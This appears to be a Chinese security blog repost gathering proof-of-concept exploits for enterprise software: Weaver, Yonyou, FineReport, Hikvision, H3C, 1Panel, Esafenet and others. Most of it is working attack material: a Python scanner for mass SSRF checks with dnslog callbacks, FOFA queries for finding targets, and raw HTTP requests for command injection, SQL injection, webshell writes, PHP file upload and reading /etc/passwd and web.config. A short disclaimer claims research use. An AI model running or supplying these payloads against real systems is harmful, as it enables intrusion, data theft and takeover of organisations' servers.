泛微E-Mobile installOperate.do 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。
FOFA:
product="泛微-EMobile" || header="EMobileServer"
GET /install/installOperate.do?svrurl=http://test.emobile.dnslog.cn HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Connection: close
# encoding:utf-8 import time import requests import argparse import ssl import urllib3 import re from requests.exceptions import RequestException from urllib3.exceptions import InsecureRequestWarning # ssl._create_unverified_context:创建一个 SSL 上下文,用于处理 HTTPS 请求时不验证服务器证书的情况。 ssl._create_default_https_context = ssl._create_unverified_context # urllib3.disable_warnings():禁用 urllib3 库的不安全请求警告,即不显示由于不安全的 HTTPS 请求而引发的警告信息。 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # 打印颜色 RED = '\033[31m' GREEN = '\033[32m' RESET = '\033[0m' def check_vuln(url): url = url.strip("/") headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" } headers1 = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3", "Cookie": "PHPSESSID=pgqapiopj5rssr6a2ejvsi69m3; b-user-id=98195658-f7ad-f233-35b2-5f6d469d240d" } dnslog_url = "http://dnslog.cn/getdomain.php" try: getdomain = requests.get(dnslog_url, headers=headers1, verify=False, timeout=15) target = url + "/install/installOperate.do?svrurl=http://1.qwe." + getdomain.text result_response = requests.get(target, headers=headers, verify=False, timeout=15) for i in range(0, 3): refresh = requests.get(url='http://dnslog.cn/getrecords.php', headers=headers1, timeout=60) time.sleep(1) if getdomain.text in refresh.text: print(f"{RED}[+] {url} 存在WeaverE-Mobile-installOperate-SSRF漏洞{RESET}") return True else: print(f"{GREEN}[-] {url} 不存在WeaverE-Mobile-installOperate-SSRF漏洞{RESET}") return True except Exception as e: print(f"{GREEN}[-] {url} 请求失败{RESET}") def main(): parser = argparse.ArgumentParser(description='WeaverE-Mobile-installOperate-SSRF漏洞') parser.add_argument('-u', '--url', help='目标URL') parser.add_argument('-f', '--file', help='目标URL文件') args = parser.parse_args() if args.url: args.url = "http://" + args.url if not args.url.startswith(('http://', 'https://')) else args.url check_vuln(args.url) elif args.file: with open(args.file, 'r') as f: urls = f.read().splitlines() for url in urls: url = "http://" + url if not url.startswith(('http://', 'https://')) else url check_vuln(url) if __name__ == '__main__': main()
python .WeaverE-Mobile-installOperate-SSRF.py -f .1.txt
python .WeaverE-Mobile-installOperate-SSRF.py -u 192.168.1.1::8088
F-logic DataCube3存在命令执行漏洞(CVE-2024-7066) fofa:title=="DataCube3" POST /admin/config_time_sync.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 Cache-Control: max-age=0 Connection: keep-alive Content-Length: 116 Content-Type: application/x-www-form-urlencoded Cookie: SESS_IDS=24ef0vbucnke26mtreijnfumve Host: x.x.x.x Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 accesstime=0.66992700 1710752870&execute=&ntp_enable=&ntp_server=127.0.0.1|id >aaa.txt|&ntp_retry_count=1 金慧综合管理信息系统SQL注入漏洞 POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1 Host: Accept-Encoding: gzip, deflate Accept: */* X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Todo=Validate&LoginName=1%27+AND+5094+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%285094%3D5094%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29+AND+%27JKJg%27%3D%27JKJg&Password=&CDomain=Local&FromUrl= 用友时空KSOA PreviewKPQT SQL注入漏洞 fofa: product="用友-时空KSOA" GET /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 Connection: close 帆软ReportServer SQL注入漏洞 GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Faaa.jsp%27%20as%20gggggg%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20gggggg.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20gggggg.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B'),1,1)} HTTP/1.1 Host: Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: keep-alive 金和 OA C6 GeneralXmlhttpPage.aspx SQL 注入漏洞 GET /C6/Jhsoft.Web.appraise/AppraiseScoreUpdate.aspx/GeneralXmlhttpPage.aspx/?id=%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A4 HTTP/1.1 百易云资产管理运营系统任意文件上传 POST /comfileup.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Content-Type: multipart/form-data; boundary=--------1110146050 ----------1110146050 Content-Disposition: form-data; name="file";filename="rce.php" <?php system("whoami");unlink(__FILE__);?> ----------1110146050-- 联软安渡UniNXG安全数据交换系统 SQL注入漏洞 UniExServices/link/queryLinklnfo?address=';SELECT PG_SLEEP(5)-- 天问物业ERP系统ContractDownLoad存在任意文件读取漏洞 /HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config 天问物业ERP系统AreaAvatarDownLoad任意文件读取漏洞 /HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config 用友 NC UserAuthenticationServlet 反序列化漏洞 POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1 Host: 127.0.0.1 Content-Type: application/json Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Content-Length: 114 {"clientParam":"{\"x\":{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"1ksla7e.dnslog.cn\"}}}"} 用友U8Cloud ActionServlet SQL注入 GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 海康威视综合安防管理平台detection存在前台远程命令执行 POST /center/api/installation/detection HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/json;charset=UTF-8 {"type":"environment","operate":"","machines":{"id": "$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"} Bazarrswaggerui组件目录穿越导致任意文件读取漏洞 GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 H3C Workspace 云桌面 远程命令执行漏洞 fofa:"H3C Workspace" /webui/?g=aaa_portal_auth_adv_submit&tab_name=广告模板&welcome_word=广告模板&btn_color=337ab7&suffix=%7Burlenc(%60id+%3E/usr/local/webui/test.txt%60)%7D&bkg_flag=0&check_btn_color=&des=undefined 1Panel 远程代码执行漏洞 GET /.git/config HTTP/1.1 Host: User-Agent: test',"test", "test", "", "YmxvZy5tbzYwLmNu", "test", 0, "deny", 0, 1);ATTACH DATABASE '/www/sites/test/index/test.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo();');#Connection: close 蓝凌 EKP 远程代码执行漏洞 /ekp/sys/ui/sys_ui_component/sysUiComponent.do?method=replaceExtend&extendId=../../../../resource/help/km/review/&folderName=../../../ekp/sys/common 泛微 e-cology9 /services/WorkPlanService 前台SQL注入 POST /services/WorkPlanService HTTP/1.1 Host: Content-Length: 380 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/120.0.6367.118 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 SOAPAction: Content-Type: text/xml;charset=UTF-8 Referer: http://0.0.0.0/services/WorkPlanService Cookie: ecology_JSessionid=bibwzto5sdeg43J9Fz0iu Connection: close <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn"> <soapenv:Header/> <soapenv:Body> <web:deleteWorkPlan> <!--type: string--> <web:in0>(SELECT 123 FROM (SELECT(SLEEP(3-(IF(1=1,0,5)))))NZeo)</web:in0> <!--type: int--> <web:in1>22</web:in1> </web:deleteWorkPlan> </soapenv:Body> </soapenv:Envelope> 泛微E-Mobile installOperate.do SSRF漏洞 FOFA:header="EMobileServer" GET /install/installOperate.do?svrurl=http://dnslog.cn HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: close 亿赛通电子文档安全管理系统NoticeAjax接口存在SQL注入漏洞 fofa: app="亿赛通-DLP" POST /CDGServer3/NoticeAjax;Service HTTP/1.1 Host: x.x.x.x:8443 Cookie: JSESSIONID=A7058CC5796E5F433F2CC668C7B7B77D; JSESSIONID=0E09F2450421C51339E5657425612536 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Priority: u=0, i Connection: close Content-Length: 98 Content-Type: application/x-www-form-urlencoded command=delNotice¬iceId=111';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'-- 亿赛通电子文档安全管理系统NetSecConfigAjax接口存在SQL注入漏洞 fofa: app="亿赛通-DLP" POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 Host: x.x.x.x Cookie: JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917; JSESSIONID=06DCD58EDC037F785605A29CD7425C66 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Priority: u=0, i Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 98 command=updateNetSec&state=*
原文始发于微信公众号(扫地僧的茶饭日常):【漏洞复现】泛微E-Mobile installOperate.do SSRF漏洞 | HW POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论